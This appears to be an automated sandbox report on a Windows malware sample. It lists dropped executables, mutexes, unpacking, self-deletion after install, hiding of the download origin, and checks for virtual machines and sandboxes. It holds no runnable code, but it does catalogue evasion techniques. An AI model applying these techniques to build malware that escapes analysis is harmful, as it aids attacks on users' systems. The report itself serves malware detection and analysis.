                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlbJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0258CDE1 CreateToolhelp32Snapshot,Module32First,0_2_0258CDE1
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6612
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdb source: 46A3.exe, 0000000A.00000002.984001831.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 46A3.exe, 0000000A.00000002.984079448.0000000003F6A000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984950384.0000000005240000.00000004.08000000.00040000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000003901000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmp, Protect544cd51a.dll.10.dr
                  Source: Binary string: communication_program_compendium.pdb source: 46A3.exe, 0000000A.00000000.981708915.0000000000332000.00000002.00000001.01000000.00000007.sdmp, 46A3.exe.1.dr
                  Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdbu source: 46A3.exe, 0000000A.00000002.984001831.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 46A3.exe, 0000000A.00000002.984950384.00000000052FA000.00000004.08000000.00040000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\wfshtitUnpacked PE file: 7.2.wfshtit.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040264F push esi; iretd 0_2_00402660
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402661 push esi; iretd 0_2_0040266F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402616 push esi; iretd 0_2_00402617
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004025EF push esi; iretd 0_2_00402608
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401EA4 push esp; retf 0_2_00401EA7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0258EA20 push esi; iretd 0_2_0258EB76
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0258EB77 push esi; iretd 0_2_0258EB76
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0258EB07 push esi; iretd 0_2_0258EB76
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0040264F push esi; iretd 7_2_00402660
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00402661 push esi; iretd 7_2_0040266F
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00402616 push esi; iretd 7_2_00402617
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004025EF push esi; iretd 7_2_00402608
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00401EA4 push esp; retf 7_2_00401EA7
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0251DA60 push esi; iretd 7_2_0251DBB6
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0251DB47 push esi; iretd 7_2_0251DBB6
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0251DBB7 push esi; iretd 7_2_0251DBB6
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08CC2B push ecx; ret 10_2_6F08CC3E
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08D565 push ecx; ret 10_2_6F08D578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00401A78 push eax; mov dword ptr [esp], 00000000h11_2_00401A7D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00466BCD push esi; ret 11_2_00466BD6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00456EE8 push ecx; ret 11_2_00456EFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00465766 push 00000000h; ret 11_2_00465768
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F03B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,10_2_6F03B6C0
                  Source: 46A3.exe.1.drStatic PE information: 0xCFACD4F3 [Wed May 29 12:13:39 2080 UTC]
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wfshtitJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wfshtitJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\46A3.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BB04.exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Deletes itself after installation
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wfshtit:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: 46A3.exe PID: 4284, type: MEMORYSTR
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: wfshtit, 00000007.00000002.951716277.000000000250A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Checks if the current machine is a virtual machine (disk enumeration)
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5172Thread sleep count: 372 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3500Thread sleep count: 1271 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3500Thread sleep time: -127100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 948Thread sleep count: 1128 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 948Thread sleep time: -112800s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 3908Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6756Thread sleep count: 300 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6768Thread sleep count: 375 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6768Thread sleep time: -37500s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6780Thread sleep count: 270 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3500Thread sleep count: 2948 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3500Thread sleep time: -294800s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exe TID: 5268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4152Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6948Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 372Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1271Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1128Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 375Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2948Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetAdaptersInfo,GetAdaptersInfo,11_2_00421AC8
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeAPI call chain: ExitProcess graph end nodegraph_10-58442
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeAPI call chain: ExitProcess graph end nodegraph_10-58675
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_11-33593
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009DFB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: explorer.exe, 00000001.00000000.897656150.0000000006929000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}(
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Usersd
                  Source: explorer.exe, 00000001.00000000.897634595.00000000067AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009EB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}[\yf
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009EB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}a
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAv
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.dll,-2
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1050683649.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1069988032.00000000051F8000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1069988032.0000000005278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.0000000005278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr#
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EADD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x1
                  Source: explorer.exe, 00000001.00000000.897634595.00000000067A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000z
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00Rom0
                  Source: explorer.exe, 00000001.00000000.897755386.0000000009D5D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
